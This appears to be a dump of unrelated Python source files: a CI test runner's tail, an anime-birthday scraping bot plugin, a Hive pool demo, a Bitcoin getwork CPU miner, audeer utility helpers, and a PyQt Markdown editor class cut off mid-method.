elif action == 'IdleSleep':
CiTestObj.IdleSleep()
elif action == 'Perform_X2_Handover':
CiTestObj.Perform_X2_Handover()
elif action == 'Build_PhySim':
HTML=ldpc.Build_PhySim(HTML,CONST)
if ldpc.exitStatus==1:sys.exit()
elif action == 'Run_PhySim':
HTML=ldpc.Run_PhySim(HTML,CONST,id)
else:
sys.exit('Invalid class (action) from xml')
CiTestObj.FailReportCnt += 1
if CiTestObj.FailReportCnt == CiTestObj.repeatCounts[0] and RAN.prematureExit:
logging.debug('Testsuite failed ' + str(CiTestObj.FailReportCnt) + ' time(s)')
HTML.CreateHtmlTabFooter(False)
sys.exit('Failed Scenario')
else:
logging.info('Testsuite passed after ' + str(CiTestObj.FailReportCnt) + ' time(s)')
HTML.CreateHtmlTabFooter(True)
elif re.match('^LoadParams$', mode, re.IGNORECASE):
pass
else:
HELP.GenericHelp(CONST.Version)
sys.exit('Invalid mode')
sys.exit(0)
|
webcrawl.py | """ Plugins to analyze websites """
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from datetime import date
from functools import lru_cache
from html.parser import HTMLParser
from http.client import HTTPResponse
from logging import getLogger
from urllib.error import URLError
from urllib.request import Request, urlopen
from threading import Thread
from typing import Callable, Dict, List, Optional, Tuple
from . import AbstractPlugin, ChatCommandEventData, ChatOutputEventData, Event
# PLUGINS
class AnimeBirthdaysPlugin(AbstractPlugin):
""" Anime birthdays plugin class """
def __init__(self, name: str, publish_event: Callable[[Event], None]):
super().__init__(name, publish_event)
def apply_event(self, event: Event):
# Is valid plugin command?
if isinstance(event.data, ChatCommandEventData):
data: ChatCommandEventData = event.data
if data.command == 'help':
self._publish_event_data(ChatOutputEventData('Command: anime_birthdays', event.publisher, data.channel_id))
elif data.command == 'anime_birthdays':
# Show characters with todays birthday from anisearch.com
def run():
try:
self._publish_event_data(ChatOutputEventData(
'Anime birthdays:\n' + '\n'.join(map(
lambda character: '{} ({}) [{}]:\n{}'.format(character.name, character.anime, character.rating, character.url),
_get_anisearch_birthday_characters()
)),
event.publisher, data.channel_id
))
except URLError as ex:
self._log.error('Loading characters failed: %s', ex)
Thread(target=run, daemon=True).start()
# REGISTRATION
def register_plugins(workers: List[AbstractPlugin], publish_event: Callable[[Event], None], _config: Dict[str,Dict[str,str]], _env: Dict[str, str]):
""" Register local plugins to bot """
workers.append(AnimeBirthdaysPlugin('anime_birthdays', publish_event))
# HELPERS
@dataclass
class _AnisearchCharacter:
name: str
anime: Optional[str]
rating: int
url: str
class _AnisearchBirthdayCharactersParser(HTMLParser):
def __init__(self, day: int):
# Initialization
super().__init__()
self._day = day
self._rating_suffix = ' ❤' # Text node ends with unicode heart symbol
# Results
self._characters: List[_AnisearchCharacter] = []
self._log = getLogger(__name__)
# Parser state
self._section_today = False
def get_characters(self) -> List[_AnisearchCharacter]:
""" Get parsed characters """
return self._characters
def error(self, message: str):
self._log.error(message)
def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]):
attrs_dict = dict(attrs)
if tag == 'section' and attrs_dict.get('id') == 'day-' + str(self._day):
self._section_today = True
elif self._section_today and tag == 'a' and 'data-title' in attrs_dict and 'href' in attrs_dict:
self._characters.append(_AnisearchCharacter(
attrs_dict['data-title'].replace('Character: ', '').title(),
None,
0,
'http://www.anisearch.com/' + attrs_dict['href']
))
def handle_endtag(self, tag: str):
if tag == 'section':
self._section_today = False
def handle_data(self, data: str):
if self._section_today and self._characters and data.endswith(self._rating_suffix):
try:
self._characters[-1].rating = int(data.replace(self._rating_suffix, ''))
except ValueError as ex:
self._log.error('Rating for %s: %s', self._characters[-1], ex)
class _AnisearchCharacterAnimeParser(HTMLParser):
def __init__(self):
super().__init__()
self._anime = None
self._log = getLogger(__name__)
def get_anime(self) -> str:
""" Get parsed anime """
return self._anime
def error(self, message: str):
self._log.error(message)
def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]):
if tag == 'a':
anime = [attr[1].replace('Anime: ', '') for attr in attrs if attr[0] == 'data-title' and attr[1].startswith('Anime: ')]
if anime:
self._anime = anime[0] # Always overrides, results in last / oldest anime
@lru_cache(7)
def _get_anisearch_birthday_characters(birthday: date = date.today()) -> List[_AnisearchCharacter]:
user_agent_headers = {'User-Agent': 'Mozilla/5.0'} # Hack to prevent websites blocking bots
http_response: HTTPResponse = None # Typing for url responses of http requests
# Find characters by birthday
with urlopen(Request(
'http://www.anisearch.com/character/birthdays?month=' + str(birthday.month),
headers=user_agent_headers
)) as http_response:
parser = _AnisearchBirthdayCharactersParser(birthday.day)
parser.feed(str(http_response.read(), 'utf-8'))
characters = parser.get_characters()
# Add anime to characters
def add_anime(character: _AnisearchCharacter):
with urlopen(Request(
character.url,
headers=user_agent_headers
)) as http_response:
parser = _AnisearchCharacterAnimeParser()
parser.feed(str(http_response.read(), 'utf-8'))
character.anime = parser.get_anime()
with ThreadPoolExecutor() as pool:
pool.map(add_anime, characters)
# Restrict to anime characters and sort by rating
return list(sorted(
filter(
lambda character: character.anime,
characters
),
key=lambda c: c.rating,
reverse=True
))
|
hive_demo.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/5/12 12:12
# @Author : ysy
# @Site :
# @File : hive_demo.py
# @Software: PyCharm
from hivepool.hive_pool import get_hive_pool, HivePool
import threading
import time
import uuid
import random
host = "cdh070"
port = 10000
database = "guotie"
def query(sleep=0):
hive_pool = get_hive_pool(host, port=port, database=database, timeout=3)
u = uuid.uuid1()
print("{} start".format(u))
with hive_pool.open() as cursor:
print(u, "enter")
cursor.execute("select * from test_hive_alarm_id")
result = cursor.fetchone()
print(u, result)
if not sleep:
return
time.sleep(random.randrange(2, 4))
print(u, "exit")
def multi_query():
for i in range(20):
t = threading.Thread(target=query, args=(10, ))
t.start()
if __name__ == '__main__':
multi_query() |
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 10109
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
utils.py | import concurrent.futures
from collections.abc import Iterable
import copy
from distutils.version import LooseVersion
import functools
import hashlib
import inspect
import multiprocessing
import queue
import subprocess
import threading
import typing
import uuid
import warnings
from audeer.core import tqdm
__doctest_skip__ = ['git_repo_tags', 'git_repo_version']
def deprecated(
*,
removal_version: str,
alternative: str = None
) -> typing.Callable:
"""Mark code as deprecated.
Provide a `decorator <https://www.python.org/dev/peps/pep-0318/>`_
to mark functions/classes as deprecated.
You have to specify the version,
for which the deprecated code will be removed.
If you change only small things
like renaming a function or an argument,
it will be fine to remove the code
with the next minor release (`X.(Y+1).Z`).
Otherwise, choose the next major release (`(X+1).Y.Z`).
Args:
removal_version: version the code will be removed
alternative: alternative code to use
Example:
>>> @deprecated(removal_version='2.0.0')
... def deprecated_function():
... pass
"""
def _deprecated(func):
# functools.wraps preserves the name
# and docstring of the decorated code:
# https://docs.python.org/3/library/functools.html#functools.wraps
@functools.wraps(func)
def new_func(*args, **kwargs):
message = (
f'{func.__name__} is deprecated and will be removed '
f'with version {removal_version}.'
)
if alternative is not None:
message += f' Use {alternative} instead.'
warnings.warn(message, category=UserWarning, stacklevel=2)
return func(*args, **kwargs)
return new_func
return _deprecated
def deprecated_default_value(
*,
argument: str,
change_in_version: str,
new_default_value: typing.Any,
) -> typing.Callable:
"""Mark default value of keyword argument as deprecated.
Provide a `decorator <https://www.python.org/dev/peps/pep-0318/>`_
to mark the default value of a keyword argument as deprecated.
You have to specify the version
for which the default value will change
and the new default value.
Args:
argument: keyword argument
change_in_version: version the default value will change
new_default_value: new default value
Example:
>>> @deprecated_default_value(
... argument='foo',
... change_in_version='2.0.0',
... new_default_value='bar',
... )
... def deprecated_function(foo='foo'):
... pass
"""
def _deprecated(func):
# functools.wraps preserves the name
# and docstring of the decorated code:
# https://docs.python.org/3/library/functools.html#functools.wraps
@functools.wraps(func)
def new_func(*args, **kwargs):
if argument not in kwargs:
signature = inspect.signature(func)
default_value = signature.parameters[argument].default
message = (
f"The default of '{argument}' will change from "
f"'{default_value}' to '{new_default_value}' "
f'with version {change_in_version}.'
)
warnings.warn(message, category=UserWarning, stacklevel=2)
return func(*args, **kwargs)
return new_func
return _deprecated
def deprecated_keyword_argument(
*,
deprecated_argument: str,
removal_version: str,
new_argument: str = None,
mapping: typing.Callable = None,
) -> typing.Callable:
r"""Mark keyword argument as deprecated.
Provide a `decorator <https://www.python.org/dev/peps/pep-0318/>`_
to mark keyword arguments as deprecated.
You have to specify the version,
for which the deprecated argument will be removed.
The content assigned to ``deprecated_argument``
is passed on to the ``new_argument``.
Args:
deprecated_argument: keyword argument to be marked as deprecated
removal_version: version the code will be removed
new_argument: keyword argument that should be used instead
mapping: if the keyword argument is not only renamed,
but expects also different input values,
you can map to the new ones with this callable
Example:
>>> @deprecated_keyword_argument(
... deprecated_argument='foo',
... new_argument='bar',
... removal_version='2.0.0',
... )
... def function_with_new_argument(*, bar):
... pass
"""
def _deprecated(func):
# functools.wraps preserves the name
# and docstring of the decorated code:
# https://docs.python.org/3/library/functools.html#functools.wraps
@functools.wraps(func)
def new_func(*args, **kwargs):
if deprecated_argument in kwargs:
message = (
f"'{deprecated_argument}' argument is deprecated "
f"and will be removed with version {removal_version}."
)
argument_content = kwargs.pop(deprecated_argument)
if new_argument is not None:
message += f" Use '{new_argument}' instead."
if mapping is not None:
kwargs[new_argument] = mapping(argument_content)
else:
kwargs[new_argument] = argument_content
warnings.warn(
message,
category=UserWarning,
stacklevel=2,
)
return func(*args, **kwargs)
return new_func
return _deprecated
def flatten_list(
nested_list: typing.List
) -> typing.List:
"""Flatten an arbitrarily nested list.
Implemented without recursion to avoid stack overflows.
Returns a new list, the original list is unchanged.
Args:
nested_list: nested list
Returns:
flattened list
Example:
>>> flatten_list([1, 2, 3, [4], [], [[[[[[[[[5]]]]]]]]]])
[1, 2, 3, 4, 5]
>>> flatten_list([[1, 2], 3])
[1, 2, 3]
"""
def _flat_generator(nested_list):
while nested_list:
sublist = nested_list.pop(0)
if isinstance(sublist, list):
nested_list = sublist + nested_list
else:
yield sublist
nested_list = copy.deepcopy(nested_list)
return list(_flat_generator(nested_list))
def freeze_requirements(outfile: str):
r"""Log Python packages of activate virtual environment.
Args:
outfile: file to store the packages.
Usually a name like :file:`requirements.txt.lock` should be picked.
Raises:
RuntimeError: if running ``pip freeze`` returns an error
"""
cmd = f'pip freeze > {outfile}'
with subprocess.Popen(
args=cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.PIPE,
shell=True,
) as p:
_, err = p.communicate()
if bool(p.returncode):
raise RuntimeError(f'Freezing Python packages failed: {err}')
def git_repo_tags(
*,
v: bool = None,
) -> typing.List:
r"""Get a list of available git tags.
The tags are inferred by executing
``git tag`` in the current folder.
If the command fails,
an empty list is returned.
Args:
v: if ``True`` tags start always with ``v``,
if ``False`` they never start with ``v``,
if ``None`` the original tag names are returned
Returns:
list of tags
Example:
>>> git_repo_tags()
['v1.0.0', 'v1.1.0', 'v2.0.0']
"""
try:
git = ['git', 'tag']
tags = subprocess.check_output(git)
tags = tags.decode().strip().split('\n')
except Exception: # pragma: nocover
tags = []
if v is None:
return tags
if v:
tags = [f'v{t}' if not t.startswith('v') else t for t in tags]
else:
tags = [t[1:] if t.startswith('v') else t for t in tags]
return tags
def git_repo_version(
*,
v: bool = True,
) -> str:
r"""Get a version number from current git ref.
The version is inferred executing
``git describe --tags --always``.
If the command fails,
``'<unknown>'`` is returned.
Args:
v: if ``True`` version starts always with ``v``,
otherwise it never starts with ``v``
Returns:
version number
Example:
>>> git_repo_version()
'v1.0.0'
"""
try:
git = ['git', 'describe', '--tags', '--always']
version = subprocess.check_output(git)
version = version.decode().strip()
except Exception: # pragma: nocover
version = '<unknown>'
if version.startswith('v') and not v: # pragma: nocover (only local)
version = version[1:]
elif not version.startswith('v') and v: # pragma: nocover (only github)
version = f'v{version}'
return version
def is_semantic_version(version: str) -> bool:
r"""Check if given string represents a `semantic version`_.
Your version has to comply to ``X.Y.Z`` or ``vX.Y.Z``,
where X, Y, Z are all integers.
Additional version information, like ``beta``
has to be added using a ``-`` or ``+``,
e.g. ``X.Y.Z-beta``.
.. _semantic version: https://semver.org
Args:
version: version string
Returns:
``True`` if version is a semantic version
Example:
>>> is_semantic_version('v1')
False
>>> is_semantic_version('1.2.3-r3')
True
>>> is_semantic_version('v0.7.2-9-g1572b37')
True
"""
version_parts = version.split('.')
if len(version_parts) < 3:
return False
def is_integer_convertable(x):
try:
int(x)
return True
except ValueError:
return False
x, y = version_parts[:2]
# Ignore starting 'v'
if x.startswith('v'):
x = x[1:]
z = '.'.join(version_parts[2:])
# For Z, '-' and '+' are also allowed as separators,
# but you are not allowed to have an additonal '.' before
z = z.split('-')[0]
z = z.split('+')[0]
if len(z.split('.')) > 1:
return False
for v in (x, y, z):
if not is_integer_convertable(v):
return False
return True
def is_uid(uid: str) -> bool:
r"""Check if string is a unique identifier.
Unique identifiers can be generated with :func:`audeer.uid`.
Args:
uid: string
Returns:
``True`` if string is a unique identifier
"""
if uid is None:
return False
if not isinstance(uid, str):
return False
try:
uuid.UUID(uid, version=1)
except ValueError:
return False
return True
def run_tasks(
task_func: typing.Callable,
params: typing.Sequence[
typing.Tuple[
typing.Sequence[typing.Any],
typing.Dict[str, typing.Any],
]
],
*,
num_workers: int = 1,
multiprocessing: bool = False,
progress_bar: bool = False,
task_description: str = None
) -> typing.Sequence[typing.Any]:
r"""Run parallel tasks using multprocessing.
.. note:: Result values are returned in order of ``params``.
Args:
task_func: task function with one or more
parameters, e.g. ``x, y, z``, and optionally returning a value
params: sequence of tuples holding parameters for each task.
Each tuple contains a sequence of positional arguments and a
dictionary with keyword arguments, e.g.:
``[((x1, y1), {'z': z1}), ((x2, y2), {'z': z2}), ...]``
num_workers: number of parallel jobs or 1 for sequential
processing. If ``None`` will be set to the number of
processors on the machine multiplied by 5 in case of
multithreading and number of processors in case of
multiprocessing
multiprocessing: use multiprocessing instead of multithreading
progress_bar: show a progress bar
task_description: task description
that will be displayed next to progress bar
Example:
>>> power = lambda x, n: x ** n
>>> params = [([2, n], {}) for n in range(10)]
>>> run_tasks(power, params, num_workers=3)
[1, 2, 4, 8, 16, 32, 64, 128, 256, 512]
"""
num_tasks = max(1, len(params))
results = [None] * num_tasks
if num_workers == 1: # sequential
with tqdm.progress_bar(
params,
total=len(params),
desc=task_description,
disable=not progress_bar,
) as pbar:
for index, param in enumerate(pbar):
results[index] = task_func(*param[0], **param[1])
else: # parallel
if multiprocessing:
executor = concurrent.futures.ProcessPoolExecutor
else:
executor = concurrent.futures.ThreadPoolExecutor
with executor(max_workers=num_workers) as pool:
with tqdm.progress_bar(
total=len(params),
desc=task_description,
disable=not progress_bar,
) as pbar:
futures = []
for param in params:
future = pool.submit(task_func, *param[0], **param[1])
future.add_done_callback(lambda p: pbar.update())
futures.append(future)
for idx, future in enumerate(futures):
result = future.result()
results[idx] = result
return results
@deprecated(removal_version='2.0.0', alternative='run_tasks')
def run_worker_threads(
task_fun: typing.Callable,
params: typing.Sequence[typing.Any] = None,
*,
num_workers: int = None,
progress_bar: bool = False,
task_description: str = None
) -> typing.Sequence[typing.Any]: # pragma: no cover
r"""Run parallel tasks using worker threads.
.. note:: Result values are returned in order of ``params``.
Args:
task_fun: task function with one or more
parameters, e.g. ``x, y, z``, and optionally returning a value
params: list of parameters (use tuples in case of multiple parameters)
for each task, e.g. ``[(x1, y1, z1), (x2, y2, z2), ...]``
num_workers: number of worker threads (defaults to number of available
CPUs multiplied by ``5``)
progress_bar: show a progress bar
task_description: task description
that will be displayed next to progress bar
Example:
>>> power = lambda x, n: x ** n
>>> params = [(2, n) for n in range(10)]
>>> run_worker_threads(power, params, num_workers=3)
[1, 2, 4, 8, 16, 32, 64, 128, 256, 512]
"""
if params is None:
params = []
num_tasks = max(1, len(params))
results = [None] * num_tasks
if num_workers is None:
num_workers = multiprocessing.cpu_count() * 5
# Ensure num_workers is positive
num_workers = max(1, num_workers)
# Do not use more workers as needed
num_workers = min(num_workers, num_tasks)
# num_workers == 1 -> run sequentially
if num_workers == 1:
for index, param in enumerate(params):
if type(param) in (list, tuple):
results[index] = task_fun(*param)
else:
results[index] = task_fun(param)
# num_workers > 1 -> run parallel
else:
# Create queue, possibly with a progress bar
if progress_bar:
class QueueWithProgbar(queue.Queue):
def __init__(self, num_tasks, maxsize=0):
super().__init__(maxsize)
self.pbar = tqdm.progress_bar(
total=num_tasks,
desc=task_description,
)
def task_done(self):
super().task_done()
self.pbar.update(1)
q = QueueWithProgbar(num_tasks)
else:
q = queue.Queue()
# Fill queue
for index, param in enumerate(params):
q.put((index, param))
# Define worker thread
def _worker():
while True:
item = q.get()
if item is None:
break
index, param = item
if type(param) in (list, tuple):
results[index] = task_fun(*param)
else:
results[index] = task_fun(param)
q.task_done()
# Start workers
threads = []
for i in range(num_workers):
t = threading.Thread(target=_worker)
t.start()
threads.append(t)
# Block until all tasks are done
q.join()
# Stop workers
for _ in range(num_workers):
q.put(None)
for t in threads:
t.join()
return results
def sort_versions(
versions: typing.List[str],
) -> typing.List:
"""Sort version numbers.
If a version starts with ``v``,
the ``v`` is ignored during sorting.
Args:
versions: sequence with semantic version numbers
Returns:
sorted list of versions with highest as last entry
Raises:
ValueError: if the version does not comply
with :func:`is_semantic_version`
Example:
>>> vers = [
... '2.0.0',
... '2.0.1',
... 'v1.0.0',
... 'v2.0.0-1-gdf29c4a',
... ]
>>> sort_versions(vers)
['v1.0.0', '2.0.0', 'v2.0.0-1-gdf29c4a', '2.0.1']
"""
for version in versions:
if not is_semantic_version(version):
raise ValueError(
"All version numbers have to be semantic versions, "
"following 'X.Y.Z', "
"where X, Y, Z are integers. "
f"But your version is: '{version}'."
)
def sort_key(value):
if value.startswith('v'):
value = value[1:]
return LooseVersion(value)
return sorted(versions, key=sort_key)
def to_list(x: typing.Any):
"""Convert to list.
If an iterable is passed,
that is not a string it will be converted using :class:`list`.
Otherwise, ``x`` is converted by ``[x]``.
Args:
x: input to be converted to a list
Returns:
input as a list
Example:
>>> to_list('abc')
['abc']
>>> to_list((1, 2, 3))
[1, 2, 3]
"""
if not isinstance(x, Iterable) or isinstance(x, str):
return [x]
else:
return list(x)
def uid(
*,
from_string: str = None,
) -> str:
r"""Generate unique identifier.
Args:
from_string: create a unique identifier
by hashing the provided string.
This will return the same identifier
for identical strings.
If ``None`` :func:`uuid.uuid1` is used.
Returns:
unique identifier containing 36 characters
with ``-`` at position 9, 14, 19, 24
Example:
>>> uid(from_string='example_string')
'626f68e6-d336-70b9-e753-ed9fad855840'
"""
if from_string is None:
uid = str(uuid.uuid1())
else:
uid = hashlib.md5()
uid.update(from_string.encode('utf-8'))
uid = uid.hexdigest()
uid = f'{uid[0:8]}-{uid[8:12]}-{uid[12:16]}-{uid[16:20]}-{uid[20:]}'
return uid
|
mikiedit.py | import os
from multiprocessing import Process
from PyQt4.QtCore import Qt, QDir, QFile, QFileInfo, QMimeData, QIODevice, QTextStream, QUrl
from PyQt4.QtGui import QAction, QCursor, QFileDialog, QFont, QTextCursor, QTextEdit, QMessageBox
from PyQt4.QtNetwork import QNetworkAccessManager, QNetworkRequest
import markdown
from whoosh.index import open_dir
import html2text
from .utils import LineEditDialog, parseTitle
class MikiEdit(QTextEdit):
def __init__(self, parent=None):
super(MikiEdit, self).__init__(parent)
self.parent = parent
self.settings = parent.settings
self.setFontPointSize(12)
self.setVisible(False)
self.ix = open_dir(self.settings.indexdir)
# Spell checker support
try:
import enchant
enchant.Dict()
self.speller = enchant.Dict()
except ImportError:
print("Spell checking unavailable. Need to install pyenchant.")
self.speller = None
except enchant.errors.DictNotFoundError:
print("Spell checking unavailable. Need to install dictionary (e.g. aspell-en).")
self.speller = None
self.imageFilter = ""
self.documentFilter = ""
for ext in self.settings.attachmentImage:
self.imageFilter += " *" + ext
for ext in self.settings.attachmentDocument:
self.documentFilter += " *" + ext
self.imageFilter = "Image (" + self.imageFilter.strip() + ")"
self.documentFilter = "Document (" + self.documentFilter.strip() + ")"
self.downloadAs = ""
self.networkManager = QNetworkAccessManager()
self.networkManager.finished.connect(self.downloadFinished)
def updateIndex(self):
''' Update whoosh index, which cost much computing resource '''
page = self.parent.notesTree.currentPage()
content = self.toPlainText()
try:
writer = self.ix.writer()
writer.update_document(
path=page, title=parseTitle(content, page), content=content)
writer.commit()
except:
print("Whoosh commit failed.")
def downloadFinished(self, reply):
if reply.error():
print("Failed to download")
else:
attFile = QFile(self.downloadAs)
attFile.open(QIODevice.WriteOnly)
attFile.write(reply.readAll())
attFile.close()
print("Succeeded")
reply.deleteLater()
def mimeFromText(self, text):
mime = QMimeData()
mime.setText(text)
return mime
def createMimeDataFromSelection(self):
""" Reimplement this to prevent copied text taken as hasHtml() """
plaintext = self.textCursor().selectedText()
# From QTextCursor doc:
# if the selection obtained from an editor spans a line break,
# the text will contain a Unicode U+2029 paragraph separator character
# instead of a newline \n character
text = plaintext.replace('\u2029', '\n')
return self.mimeFromText(text)
def insertFromMimeData(self, source):
""" Intended behavior
If copy/drag something that hasUrls, then check the extension name:
if image then apply image pattern 
else apply link pattern [text](http://example.net)
If copy/drag something that hasImage, then ask for file name
If copy/drag something that hasHtml, then html2text
Else use the default insertFromMimeData implementation
"""
item = self.parent.notesTree.currentItem()
attDir = self.parent.notesTree.itemToAttachmentDir(item)
if not QDir(attDir).exists():
QDir().mkpath(attDir)
if source.hasUrls():
for qurl in source.urls():
url = qurl.toString()
filename, extension = os.path.splitext(url)
filename = os.path.basename(filename)
newFilePath = os.path.join(attDir, filename + extension)
relativeFilePath = newFilePath.replace(self.settings.notebookPath, "..")
attachments = self.settings.attachmentImage + self.settings.attachmentDocument
if QUrl(qurl).isLocalFile():
if extension.lower() in attachments:
nurl = url.replace("file://", "")
QFile.copy(nurl, newFilePath)
self.parent.updateAttachmentView()
if extension.lower() in self.settings.attachmentImage:
text = "" % (filename, relativeFilePath)
elif extension.lower() in self.settings.attachmentDocument:
text = "[%s%s](%s)\n" % (filename, extension, relativeFilePath)
else:
text = "[%s%s](%s)\n" % (filename, extension, url)
else:
if extension.lower() in attachments:
self.downloadAs = newFilePath
self.networkManager.get(QNetworkRequest(qurl))
if extension.lower() in self.settings.attachmentImage:
text = "" % (filename, relativeFilePath)
elif extension.lower() in self.settings.attachmentDocument:
text = "[%s%s](%s)\n" % (filename, extension, relativeFilePath)
else:
text = "[%s%s](%s)\n" % (filename, extension, url)
super(MikiEdit, self).insertFromMimeData(self.mimeFromText(text))
elif source.hasImage():
img = source.imageData()
attDir = self.parent.notesTree.itemToAttachmentDir(item)
dialog = LineEditDialog(attDir, self)
if dialog.exec_():
fileName = dialog.editor.text()
if not QFileInfo(fileName).suffix():
fileName += '.jpg'
filePath = os.path.join(attDir, fileName)
img.save(filePath)
relativeFilePath = filePath.replace(self.settings.notebookPath, "..")
text = "" % (fileName, relativeFilePath)
super(MikiEdit, self).insertFromMimeData(self.mimeFromText(text))
elif source.hasHtml():
backToMarkdown = html2text.HTML2Text()
html = source.html()
markdown = backToMarkdown.handle(html)
super(MikiEdit, self).insertFromMimeData(self.mimeFromText(markdown))
else:
super(MikiEdit, self).insertFromMimeData(source)
def insertAttachment(self, filePath, fileType):
item = self.parent.notesTree.currentItem()
attDir = self.parent.notesTree.itemToAttachmentDir(item)
filename, extension = os.path.splitext(filePath)
filename = os.path.basename(filename)
newFilePath = os.path.join(attDir, filename + extension)
relativeFilePath = newFilePath.replace(self.settings.notebookPath, "..")
QFile.copy(filePath, newFilePath)
self.parent.updateAttachmentView()
if fileType == self.imageFilter:
text = "" % (filename, relativeFilePath)
else:
text = "[%s%s](%s)\n" % (filename, extension, relativeFilePath)
self.insertPlainText(text)
def insertAttachmentWrapper(self):
(filePath, fileType) = QFileDialog.getOpenFileNameAndFilter(
self, self.tr('Insert attachment'), '',
self.imageFilter + ";;" + self.documentFilter)
if filePath == "":
return
self.insertAttachment(filePath, fileType)
def contextMenuEvent(self, event):
def correctWord(cursor, word):
# From QTextCursor doc:
# if there is a selection, the selection is deleted and replaced
return lambda: cursor.insertText(word)
popup_menu = self.createStandardContextMenu()
# Spellcheck the word under mouse cursor, not self.textCursor
cursor = self.cursorForPosition(event.pos())
cursor.select(QTextCursor.WordUnderCursor)
text = cursor.selectedText()
